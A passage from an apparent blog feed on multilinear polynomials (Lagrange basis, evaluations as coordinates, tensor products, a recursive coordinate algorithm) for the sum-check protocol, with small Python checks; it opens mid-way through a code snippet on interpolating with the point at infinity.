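    # Reconstruct s(t) from the leading coefficient a = s(infinity)
    # and the evaluations ys of s at the d nodes xs.
    vanish = 1
    for xk in xs:
        vanish *= (t - xk)
    total = a * vanish
    for k, xk in enumerate(xs):
        lk = 1.0
        for j, xj in enumerate(xs):
            if j != k:
                lk *= (t - xj) / (xk - xj)
        total += ys[k] * lk
    return total

s = lambda x: 3 * x**2 - 5 * x + 2
xs, ys = [0, 1], [2, 0]          # s(0) = 2, s(1) = 0
for t in [2, 5, 11]:
    assert interp_with_infinity(3, xs, ys, t) == s(t)
```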
&lt;blockquote&gt;
&lt;p&gt;For practical purposes, BDDT concentrates on an evaluation set of the form $$U_d = \{\infty,0,1,2,\ldots d - 1\}$$ to interpolate a degree $d$ polynomial.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h3 id=&quot;calculation-of-s-infty-for-a-product-of-polynomials&quot;&gt;Calculation of $s(\infty)$ for a Product of Polynomials&lt;&#x2F;h3&gt;
&lt;p&gt;The reason for this modification is that leading coefficients of products of polynomials are easy to compute: the distributive law ensures that&lt;&#x2F;p&gt;
&lt;p&gt;$$s(X) = p(X) q(X) \implies s(\infty) = p(\infty) q(\infty)$$&lt;br &#x2F;&gt;
that is: the leading coefficient of a product is the product of the leading coefficients. Moreover, for a linear polynomial $p_i(X)$, the leading coefficient can be calculated as the difference of its evaluations at 1 and 0: $p_i(1) - p_i(0)$.&lt;&#x2F;p&gt;
&lt;p&gt;Therefore, the formula is:&lt;br &#x2F;&gt;
$$s(\infty) = \prod_{i = 1}^{d} p_i(\infty) = \prod_{i = 1}^{d} (p_i (1) - p_i (0))$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Let $s(X) = p_1(X) \cdot p_2(X)$, where:&lt;br &#x2F;&gt;
- $p_1(X) = 2X + 3$&lt;br &#x2F;&gt;
- $p_2(X) = 5X - 4$&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Calculate $p_i (\infty)$ for each factor:&lt;&#x2F;strong&gt;
&lt;ul&gt;
&lt;li&gt;$p_1 (\infty) = p_1 (1) - p_1 (0) = (2(1) + 3) - (2(0) + 3) = 5 - 3 = 2$. (The leading coefficient of $p_1$ is 2.)&lt;&#x2F;li&gt;
&lt;li&gt;$p_2 (\infty) = p_2 (1) - p_2 (0) = (5(1) - 4) - (5(0) - 4) = 1 - (- 4) = 5$. (The leading coefficient of $p_2$ is 5.)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Calculate $s(\infty)$:&lt;&#x2F;strong&gt; $$s(\infty) = p_1(\infty) \cdot p_2(\infty) = 2 \cdot 5 = 10$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Verification:&lt;&#x2F;strong&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;Let’s multiply the polynomials to find $s(X)$ explicitly: $$s(X) = (2X + 3)(5X - 4) = 10X^2 - 8X + 15X - 12 = 10X^2 + 7X - 12$$&lt;&#x2F;p&gt;
&lt;p&gt;The leading coefficient of $s(X)$ is &lt;strong&gt;10&lt;&#x2F;strong&gt;, which confirms the rule.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Multilinear polynomials: survival kit</title>
          <pubDate>Tue, 26 Aug 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/multilinear-polynomials-survival-kit/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/multilinear-polynomials-survival-kit/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/multilinear-polynomials-survival-kit/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In this article we briefly introduce a list of basic properties of multilinear polynomials that are convenient to have in mind when tackling a very interesting piece of work by Bagad, Dao, Domb and Thaler: “Speeding up SUM-CHECK proving”. The authors focus on a specific setting for the SUMCHECK protocol, useful in various contexts: they narrow their attention to the case where the polynomial $g$ that is the object of the SUMCHECK claim can be written as a product of $d$ multilinear polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$g(X) = \prod\limits_{ k = 1 }^d p_k (X)$$&lt;&#x2F;p&gt;
&lt;p&gt;and proceed to craft a series of algorithms tailoring their time and memory usage. Before diving into their findings, it is perhaps timely to refresh some facts about this type of polynomial for future use.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;multilinear-polynomials-definition-and-basic-properties&quot;&gt;Multilinear polynomials: definition and basic properties&lt;&#x2F;h2&gt;
&lt;p&gt;For the rest of the article, fix a field $k$. By multilinear polynomial we mean an $\ell$-variate ($\ell\geq 0$) polynomial $f\in k\left[X_1,\ldots X_\ell\right]$ such that in each of its monomials every variable is raised to a power that is either 0 or 1. These polynomials are of great use: they appear throughout the field theory literature in different guises and recently re-emerged as useful objects in Ben Diamond and Jim Posen’s effort BINIUS.&lt;&#x2F;p&gt;
&lt;p&gt;We will use $\mathcal{M_k} \left[X_1,\ldots X_\ell\right]$ to denote the collection of all multilinear polynomials of $\ell$ variables with coefficients in $k$. Examples of multilinear polynomials abound:&lt;&#x2F;p&gt;
&lt;p&gt;$$p(X_1 , X_2) = 2 + X_1 + X_1 X_2,\quad q(X_1,X_2,X_3) = 2X_3 + X_1 X_2 X_3 + X_1 X_2,\quad \text{etc.}$$&lt;&#x2F;p&gt;
&lt;p&gt;It should be noticed that multilinear polynomials in $\ell$ indeterminates have degree bounded by $\ell$; naturally, $\mathcal{M_k} \left[X_1,\ldots X_\ell\right]$ is a vector subspace of $k\left[X_1, \ldots X_\ell \right]$: it is closed with respect to addition and scalar multiplication.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;interpolation&quot;&gt;Interpolation&lt;&#x2F;h3&gt;
&lt;p&gt;One of the great features of multilinear polynomials is that they provide a neat way of replacing arbitrary functions over a very special domain. Cutting to the chase, &lt;em&gt;any&lt;&#x2F;em&gt; function $\varphi$ defined over the hypercube $\{ 0,1 \}^\ell$ can be interpolated with multilinear polynomials. This works because the hypercube is finite: the function $\varphi$ can be identified with the list of its values $\{\varphi(x): x \in \{0,1 \}^\ell\}$ and, crucially, for each $x$ in the hypercube there is a multilinear polynomial that takes the value 1 at $x$ and evaluates to zero elsewhere.&lt;&#x2F;p&gt;
&lt;p&gt;For example, take $b = (1,0,1,1) \in \{0,1 \}^4$. Then&lt;&#x2F;p&gt;
&lt;p&gt;$$\chi_b (X_1 , X_2 , X_3 , X_4 ) = X_1 (1 - X_2 ) X_3 X_4$$&lt;&#x2F;p&gt;
&lt;p&gt;is a multilinear polynomial evaluating to 1 over $b$ and to 0 elsewhere. Generally, for $b \in \{0,1 \}^\ell$, the multilinear polynomial having this property can be expressed as&lt;&#x2F;p&gt;
&lt;p&gt;$$\chi_b (X) = \prod_{ j = 1 }^{\ell} ( b_j X_j + (1 - b_j) (1 - X_j))$$&lt;&#x2F;p&gt;
&lt;p&gt;The reader may recall Lagrange interpolation in one variable and the polynomials satisfying this sort of condition. In cryptographic lingo, these are sometimes called “equality polynomials” and are commonly denoted $eq(x,y)$. So how does this interpolation property work? Let’s cook up an example.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose we are given the function&lt;&#x2F;p&gt;
&lt;p&gt;$$\varphi (X_1 ,X_2 ) = (1 + X_1) (X_1 + X_2)$$&lt;&#x2F;p&gt;
&lt;p&gt;As it is, this polynomial has degree 2 in $X_1$ so it is not a multilinear polynomial. However it can be interpolated over the cube $\{0,1 \}^2$, by the use of the equality or Lagrange polynomials: $\chi_b$ with $b$ in the boolean square $\{0,1 \}^2$.&lt;&#x2F;p&gt;
&lt;p&gt;\begin{align*}&lt;br &#x2F;&gt;
\varphi(X_1, X_2) =&amp;amp; \sum\limits_{ b \in \{0,1\}^2 } \varphi(b) \chi_b (X_1, X_2) =\newline&lt;br &#x2F;&gt;
=&amp;amp; \varphi(0,0)(1 - X_1)(1 - X_2) + \varphi(1,0) X_1 (1 - X_2)\newline&lt;br &#x2F;&gt;
+&amp;amp; \varphi(0,1) (1 - X_1) X_2 + \varphi(1,1) X_1 X_2&lt;br &#x2F;&gt;
\end{align*}&lt;&#x2F;p&gt;
&lt;p&gt;where this equality is understood functionally: it is an equality of two functions over the boolean hypercube, one of which is a multilinear polynomial. Before getting carried away, let’s state a fact.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Fact number 1:&lt;&#x2F;strong&gt; $\mathcal{M_\ell}$ is a vector space of dimension $2^\ell$ with basis the Lagrange polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{L_\ell} = \{ \chi_b : b\in \{0,1\}^\ell \}$$&lt;&#x2F;p&gt;
&lt;p&gt;As is customarily done, there is an ordering of the dimension $\ell$ hypercube obtained by the binary expansion of the first $2^\ell$ nonnegative integers: if $0\leq m\leq 2^{\ell} - 1$ then&lt;&#x2F;p&gt;
&lt;p&gt;$$m = m_0 2^0 + m_1 2^1 + \cdots + m_{ \ell - 1 } 2^{ \ell - 1},\quad m_i\in \{0,1 \}$$&lt;&#x2F;p&gt;
&lt;p&gt;and we set the $m$-th basis polynomial to be the equality polynomial for the string $$(m_{ \ell - 1} ,\ldots, m_1, m_0)$$ This is the ordering we adopt for the Lagrange basis and the order we will use to obtain crucial information: the standard binary order. For those unfamiliar:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The &lt;strong&gt;first variable&lt;&#x2F;strong&gt;, $X_1$, is associated with the &lt;strong&gt;most significant bit (MSB)&lt;&#x2F;strong&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;The &lt;strong&gt;last variable&lt;&#x2F;strong&gt;, $X_\ell$, is associated with the &lt;strong&gt;least significant bit (LSB)&lt;&#x2F;strong&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;For example, for a 3-variable polynomial, $g(X_1, X_2, X_3)$, the hypercube coordinates are ordered as follows:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Hypercube Point&lt;&#x2F;strong&gt; (Binary Representation)&lt;&#x2F;th&gt;&lt;th&gt;&lt;strong&gt;Polynomial Coordinates&lt;&#x2F;strong&gt; $(X_1, X_2, X_3)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$000_2 = 0$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$001_2 = 1$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$010_2 = 2$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$\dots$&lt;&#x2F;td&gt;&lt;td&gt;$\dots$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$111_2 = 7$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Don’t fret: this is simply a choice of how to walk the cube and of how we will order the interpolation basis. For the sake of clarity:&lt;&#x2F;p&gt;
&lt;p&gt;First, one can easily verify that the basis&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{L_2} = \{ (1 - X_1) (1 - X_2), (1 - X_1) X_2, X_1 (1 - X_2), X_1 X_2 \}$$&lt;&#x2F;p&gt;
&lt;p&gt;interpolates the boolean hypercube in the sense that the $k$-th basis vector takes the value 1 over the binary representation of $k$ and takes the value 0 elsewhere.&lt;&#x2F;p&gt;
&lt;p&gt;Second, the basis for $\mathcal{M_3} \left[X_1 ,X_2 ,X_3 \right]$ is obtained by taking each vector of $\mathcal{L_2}$ in order, from left to right, and multiplying it first by $(1 - X_3)$ and then by $X_3$. Then $\mathcal{L_3}$ consists of the collection&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$(1 - X_1) ( 1 - X_2 )( 1 - X_3)$&lt;&#x2F;li&gt;
&lt;li&gt;$(1 - X_1) (1 - X_2) X_3$&lt;&#x2F;li&gt;
&lt;li&gt;$(1 - X_1) X_2 (1 - X_3)$&lt;&#x2F;li&gt;
&lt;li&gt;$(1 - X_1) X_2 X_3$&lt;&#x2F;li&gt;
&lt;li&gt;$X_1 (1 - X_2) (1 - X_3)$&lt;&#x2F;li&gt;
&lt;li&gt;$X_1 (1 - X_2) X_3$&lt;&#x2F;li&gt;
&lt;li&gt;$X_1 X_2 (1 - X_3)$&lt;&#x2F;li&gt;
&lt;li&gt;$X_1 X_2 X_3$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;in this specific order.&lt;&#x2F;p&gt;
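&lt;p&gt;To make the indicator property concrete, here is a small Python sketch (the helper name &lt;code&gt;chi&lt;&#x2F;code&gt; is our own, not from any library) that evaluates $\chi_b$ and checks that it is 1 at $b$ and 0 at every other vertex of the hypercube:&lt;&#x2F;p&gt;

```python
from itertools import product

def chi(b, x):
    # Equality polynomial chi_b evaluated at point x:
    # the product of b_j * x_j + (1 - b_j) * (1 - x_j) over all j,
    # which is 1 exactly when x == b on the hypercube.
    out = 1
    for bj, xj in zip(b, x):
        out *= bj * xj + (1 - bj) * (1 - xj)
    return out

# Check the indicator property for b = (1, 0, 1, 1) from the text.
b = (1, 0, 1, 1)
for x in product((0, 1), repeat=4):
    assert chi(b, x) == (1 if x == b else 0)
print("indicator property verified for b =", b)
```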
&lt;h3 id=&quot;coordinates-and-evaluations-the-golden-link&quot;&gt;Coordinates and evaluations: the golden link&lt;&#x2F;h3&gt;
&lt;p&gt;What we just discussed already sets multilinear polynomials and their bases on different ground with respect to other vector spaces. In linear algebra, for instance, expressing a vector as a linear combination of a basis involves building (and solving!) a system of linear equations. As much as we love systems of linear equations, finding the coordinates of a vector &lt;em&gt;requires solving&lt;&#x2F;em&gt; the system, and this obviously costs time and memory. It is for this reason that some bases are preferred over others: finding coordinates of vectors should be as easy as possible.&lt;&#x2F;p&gt;
&lt;p&gt;Concretely, if we wanted to represent $v = (2,3)$ as a combination of $(1,2)$ and $(5, - 7)$ we would be required first to build a system of equations and second to solve it, dealing with all the numerical complexities involved (this is a small example, but think of vectors with $2^{128}$ elements…).&lt;&#x2F;p&gt;
&lt;p&gt;It is a different story altogether if the vectors we want to use are $(1,0)$ and $(0,1)$: the canonical basis. Now the problem is almost trivially solved by eyeballing, or directly reading off, the contents of $v$:&lt;&#x2F;p&gt;
&lt;p&gt;$$v = 2\cdot (1,0) + 3\cdot (0,1)$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;This is the precise situation we have with the equality polynomials: now coordinates in this basis are simply the evaluations of the function we want to interpolate. And this is great news because computers love to evaluate.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;This conversation yields&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Fact number 2:&lt;&#x2F;strong&gt; The coordinates of a function $f$ defined over the boolean hypercube $\{0,1 \}^\ell$ with respect to the Lagrange basis $\mathcal{L_\ell}$ are simply its evaluations:&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;$$coords(f)= \left[f(b) \right]_{ b\in \{0,1 \}^\ell}$$&lt;&#x2F;p&gt;
&lt;p&gt;For instance, for the multilinear polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$g(X_1 , X_2) = 1 + X_1 + X_1 X_2$$&lt;&#x2F;p&gt;
&lt;p&gt;Then its coordinates in the interpolation basis are simply&lt;&#x2F;p&gt;
&lt;p&gt;$$g\longleftrightarrow coords(g) = \left[1,1,2,3 \right] = \left[g(0), g(1), g(2), g(3) \right]$$&lt;&#x2F;p&gt;
&lt;p&gt;where we exploited the ordering of the cube and took the liberty of “evaluating $g$ at the integers $0\leq n\leq 2^2 - 1$”.&lt;&#x2F;p&gt;
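&lt;p&gt;In code, this correspondence is nothing but evaluation in binary order. A minimal sketch (our own helper name; $X_1$ is the most significant bit, per the convention above):&lt;&#x2F;p&gt;

```python
def coords(g, num_vars):
    # Coordinates in the Lagrange (interpolation) basis are the
    # evaluations of g over {0,1}^num_vars, walking the cube in
    # binary order with X_1 as the most significant bit.
    out = []
    for m in range(2 ** num_vars):
        # Bit j of m (counting from the MSB) gives the value of X_{j+1}.
        point = [(m // 2 ** (num_vars - 1 - j)) % 2 for j in range(num_vars)]
        out.append(g(*point))
    return out

g = lambda x1, x2: 1 + x1 + x1 * x2
print(coords(g, 2))  # -> [1, 1, 2, 3]
```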
&lt;h3 id=&quot;tensorization-in-this-context&quot;&gt;Tensorization in this context&lt;&#x2F;h3&gt;
&lt;p&gt;One of the operations between polynomials that we learn in highschool is polynomial multiplication: for example, when given polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$X + 1\quad\text{and }\quad 2 + Y$$&lt;&#x2F;p&gt;
&lt;p&gt;we compute their product using the distributive law, juxtaposing indeterminates and using powers to abbreviate equal symbols juxtaposed:&lt;&#x2F;p&gt;
&lt;p&gt;$$(X + 1)( 2 + Y) = 2 X + XY + 2 + Y$$&lt;&#x2F;p&gt;
&lt;p&gt;and assuming the order of the symbols in a monomial is irrelevant. When thinking of polynomials as vectors, we need a formalism that captures this exact operation. That formalism is called the tensor product, and it allows vector multiplication just as we know it; the field that studies tensor products is called multilinear algebra and is, naturally, an older sibling of linear algebra. The symbol commonly used for the tensor product of vectors $v\in\mathbb{V}$ and $w\in\mathbb{W}$ is&lt;&#x2F;p&gt;
&lt;p&gt;$$v\otimes w\in \mathbb{V}\otimes\mathbb{W}$$&lt;&#x2F;p&gt;
&lt;p&gt;and we note that $\mathbb{V}\otimes\mathbb{W}$ is a new vector space, constructed from $\mathbb{V}$ and $\mathbb{W}$ and naturally called their tensor product. This product has all the properties we want to abstract, the distributive law being crucial for our needs:&lt;&#x2F;p&gt;
&lt;p&gt;$$v\otimes w + (2v + u) \otimes w = (3v + u)\otimes w$$&lt;&#x2F;p&gt;
&lt;p&gt;All this in our setting is quite natural: if we set $\mathbb{V}$ the vector space of polynomials of degree at most 1 in the indeterminate $X_1$ and $\mathbb{W}$ the vector space of polynomials of degree at most 1 in the indeterminate $X_2$, then&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{V}\otimes \mathbb{W} = \mathcal{M} \left[X_1 \right]\otimes \mathcal{M} \left[X_2 \right] = \mathcal{M_2} \left[X_1,X_2 \right]$$&lt;&#x2F;p&gt;
&lt;p&gt;and more importantly, the tensor product of bases yields a basis for the tensor product. The general theory guarantees that whenever $\mathcal{B}$ and $\mathcal{C}$ are bases for $\mathbb{V}$ and $\mathbb{W}$ respectively, then&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{B}\otimes\mathcal{C}=\{ v_i\otimes w_j: 1\leq i\leq \dim(\mathbb{V}),\ 1\leq j\leq \dim(\mathbb{W}) \}$$&lt;&#x2F;p&gt;
&lt;p&gt;is a basis for the new vector space. However a choice of order for those vectors must be made. To our interest, it is convenient to order the tensor products of the basis vectors in a fashion compatible with the binary expansion; in the case of $dim(\mathbb{V})=dim(\mathbb{W})=2$ the basis we’re going to be looking at is simply&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{B}\otimes\mathcal{C}=\{ v_1\otimes w_1,\ v_1\otimes w_2,\ v_2\otimes w_1,\ v_2\otimes w_2 \}$$&lt;&#x2F;p&gt;
&lt;p&gt;which is commonly referred to as the lexicographic order. In this sense, this basis works just fine: say you pick $z \in V \otimes W$ for instance&lt;&#x2F;p&gt;
&lt;p&gt;$$z = 2(v_1 \otimes w_1) + 5(v_1 \otimes w_2) + 3(v_2 \otimes w_1) - 1(v_2 \otimes w_2)$$&lt;&#x2F;p&gt;
&lt;p&gt;Its coordinate vector turns out to be $[2, 5, 3, -1]$. Moreover, since tensors are compatible with the distributive law, we are allowed to regroup the terms:&lt;&#x2F;p&gt;
&lt;p&gt;$$z = v_1 \otimes (2w_1 + 5w_2) + v_2 \otimes (3w_1 - w_2)$$&lt;&#x2F;p&gt;
&lt;p&gt;The coefficients of this combination are the following elements of $\mathbb{W}$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Coefficient of $v_1$&lt;&#x2F;strong&gt;: $c_1 = 2w_1 + 5w_2$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coefficient of $v_2$&lt;&#x2F;strong&gt;: $c_2 = 3w_1 - w_2$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;These coefficients, expressed in coordinates of the basis chosen for $\mathbb{W}$, are simply $[2, 5]$ and $[3, -1]$. The order for the tensor basis is chosen precisely to recreate the fact that:&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{concat}(\text{coords}(c_1), \text{coords}(c_2)) = \text{concat}([2, 5], [3, -1]) = [2, 5, 3, -1]$$&lt;&#x2F;p&gt;
&lt;p&gt;In the context of multilinear polynomials, this discussion makes clear that these polynomials can be obtained by recursively tensoring vector spaces of polynomials of degree at most 1 in distinct variables: we have an algebraic characterization of the vector space of multilinear polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{M_\ell} \left[X_1,\ldots X_\ell \right] = \mathcal{M_{\ell - 1}} \left[X_1,\ldots X_{ \ell - 1} \right]\otimes \mathcal{M}\left[X_\ell \right]$$&lt;&#x2F;p&gt;
&lt;p&gt;and moreover, exploiting the associativity of the tensor product we arrive at a very natural fact:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Fact number 3:&lt;&#x2F;strong&gt; Let $\{1,2,\ldots, \ell \} = J \cup I$ with $J,I$ disjoint. Then multilinear polynomials in the indeterminates $X_1,\ldots X_\ell$ can be regarded as multilinear polynomials in the indeterminates $X_j$, $j\in J$, with coefficients that are multilinear polynomials in the indeterminates $X_i$, $i\in I$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;To fix the idea, take a look at the polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$h = X_1+X_1 X_3 + 2X_2 X_3 X_4 + 2X_4$$&lt;&#x2F;p&gt;
&lt;p&gt;This naturally is a multilinear polynomial in $X_3$ and $X_4$, since they are raised to power at most 1. Using the Lagrange basis for multilinear polynomials in the variables $X_3$ and $X_4$&lt;&#x2F;p&gt;
&lt;p&gt;$$\{(1 - X_3) (1 - X_4), (1 - X_3 ) X_4, X_3 (1 - X_4), X_3 X_4 \}$$&lt;&#x2F;p&gt;
&lt;p&gt;we find the corresponding coefficients by making use of what we already discussed: the coefficients will be polynomials in the remaining variables, $X_1$ and $X_2$, obtained by evaluating the original polynomial $h$ at the four points of the hypercube for $X_3$ and $X_4$.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Coefficient of $(1 - X_3) (1 - X_4)$:&lt;&#x2F;strong&gt; we evaluate $h$ at $(X_3 = 0, X_4 = 0)$:&lt;br &#x2F;&gt;
$$h(X_1, X_2, 0, 0) = X_1 + X_1(0) + 2 X_2 (0)(0) + 2(0) = X_1$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coefficient of $(1 - X_3) X_4$:&lt;&#x2F;strong&gt; we evaluate $h$ at $(X_3 = 0, X_4 = 1)$:&lt;br &#x2F;&gt;
$$h(X_1, X_2, 0, 1) = X_1 + X_1(0) + 2X_2 (0)(1) + 2(1) = X_1 + 2$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coefficient of $X_3 (1 - X_4)$:&lt;&#x2F;strong&gt; we evaluate $h$ at $(X_3 = 1, X_4 = 0)$:&lt;br &#x2F;&gt;
$$h(X_1, X_2, 1, 0) = X_1 + X_1(1) + 2X_2 (1)(0) + 2(0) = X_1 + X_1 = 2X_1$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coefficient of $X_3 X_4$:&lt;&#x2F;strong&gt; we evaluate $h$ at $(X_3 = 1, X_4 = 1)$:&lt;br &#x2F;&gt;
$$h(X_1, X_2, 1, 1) = X_1 + X_1(1) + 2X_2(1)(1) + 2(1) = 2X_1 + 2X_2 + 2$$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Putting it all together, the coordinate vector of $h$ viewed as a multilinear polynomial in the variables $X_3$ and $X_4$ is simply&lt;&#x2F;p&gt;
&lt;p&gt;$$\left[X_1, 2+X_1, 2X_1, 2 + 2X_1 + 2X_2 \right]$$&lt;&#x2F;p&gt;
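&lt;p&gt;The four coefficients above can be double-checked numerically: since each claimed coefficient is multilinear in $X_1, X_2$, it suffices to compare evaluation tables over the boolean square. A quick sanity check in Python (names are our own):&lt;&#x2F;p&gt;

```python
from itertools import product

# h(X1, X2, X3, X4) = X1 + X1 X3 + 2 X2 X3 X4 + 2 X4 from the text.
h = lambda x1, x2, x3, x4: x1 + x1 * x3 + 2 * x2 * x3 * x4 + 2 * x4

# Claimed coefficients of h in the (X3, X4) Lagrange basis,
# indexed by the point (x3, x4) they correspond to.
claimed = {
    (0, 0): lambda x1, x2: x1,
    (0, 1): lambda x1, x2: x1 + 2,
    (1, 0): lambda x1, x2: 2 * x1,
    (1, 1): lambda x1, x2: 2 * x1 + 2 * x2 + 2,
}

# Both sides are multilinear in X1, X2, so agreement on {0,1}^2
# already implies equality as polynomials.
for (x3, x4), c in claimed.items():
    for x1, x2 in product((0, 1), repeat=2):
        assert h(x1, x2, x3, x4) == c(x1, x2)
print("all four coefficients check out")
```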
&lt;p&gt;As the reader may already be thinking, “but we can also compute the coordinates of the coordinates” — and yes, that is where we are headed: a recursive algorithm to produce the coordinates of a multilinear polynomial, or seen in a different light, a protocol that works with strings of evaluations.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Fact number 4:&lt;&#x2F;strong&gt; In the same vein, evaluating a multilinear polynomial in a subset of its variables yields a multilinear polynomial in the remaining ones.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h2 id=&quot;the-adventure-of-multilinear-interpolation&quot;&gt;The adventure of multilinear interpolation&lt;&#x2F;h2&gt;
&lt;p&gt;What we just discussed can be seen as a case of &lt;em&gt;multilinear interpolation&lt;&#x2F;em&gt;. By the nature of the interpolation basis for multilinear polynomials in $\ell$ variables, this process can be iterated and coordinates computed efficiently, if tackled in an organized manner.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;algorithm-multilinearcoordinates-interpolationbasis-g-l&quot;&gt;Algorithm: MultilinearCoordinatesInterpolationBasis(g, l)&lt;&#x2F;h3&gt;
&lt;p&gt;This algorithm takes a multilinear polynomial $g$ in $l$ variables and returns a vector of $2^l$ coordinates that represent $g$ in the multilinear interpolation basis.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Base case&lt;&#x2F;strong&gt; ($l = 0$):&lt;br &#x2F;&gt;
i. The polynomial $g$ is a constant.&lt;br &#x2F;&gt;
ii. &lt;strong&gt;Return&lt;&#x2F;strong&gt; the vector with the single coordinate $[g]$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Base case&lt;&#x2F;strong&gt; ($l = 1$):&lt;br &#x2F;&gt;
i. The polynomial $g$ is multilinear in one variable $X_1$.&lt;br &#x2F;&gt;
ii. The coordinates are the evaluations $g(0)$ and $g(1)$.&lt;br &#x2F;&gt;
iii. &lt;strong&gt;Return&lt;&#x2F;strong&gt; the vector $[g(0), g(1)]$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Recursive step&lt;&#x2F;strong&gt; ($l &amp;gt; 1$):&lt;&#x2F;p&gt;
&lt;p&gt;i. Express $g$ as a polynomial in the first variable $X_1$ with coefficients that are multilinear polynomials in the remaining $l - 1$ variables:&lt;br &#x2F;&gt;
$$g(\mathbf{X}) = C_0 (X_2, \dots, X_l)(1 - X_1) + C_1 (X_2, \dots, X_l) X_1$$&lt;br &#x2F;&gt;
ii. Compute the coefficients $C_0$ and $C_1$ by evaluating $g$ at the extreme points of $X_1$:&lt;br &#x2F;&gt;
$$C_0(X_2, \dots, X_l) = g(0, X_2, \dots, X_l)$$&lt;br &#x2F;&gt;
$$C_1(X_2, \dots, X_l) = g(1, X_2, \dots, X_l)$$&lt;br &#x2F;&gt;
iii. &lt;strong&gt;Recursively call&lt;&#x2F;strong&gt; the algorithm to find the coordinates of these two new polynomials in $l - 1$ variables:&lt;br &#x2F;&gt;
a. $coords_0 \gets$ &lt;code&gt;MultilinearCoordinatesInterpolationBasis(C_0, l - 1)&lt;&#x2F;code&gt;&lt;br &#x2F;&gt;
b. $coords_1 \gets$ &lt;code&gt;MultilinearCoordinatesInterpolationBasis(C_1, l - 1)&lt;&#x2F;code&gt;&lt;br &#x2F;&gt;
iv. The coordinates of the original polynomial $g$ are the concatenation of the vectors $coords_0$ and $coords_1$; splitting on $X_1$ first is what makes the concatenation follow the MSB-first binary order of the hypercube.&lt;br &#x2F;&gt;
v. &lt;strong&gt;Return&lt;&#x2F;strong&gt; $$concat(coords_0, coords_1)$$&lt;&#x2F;p&gt;
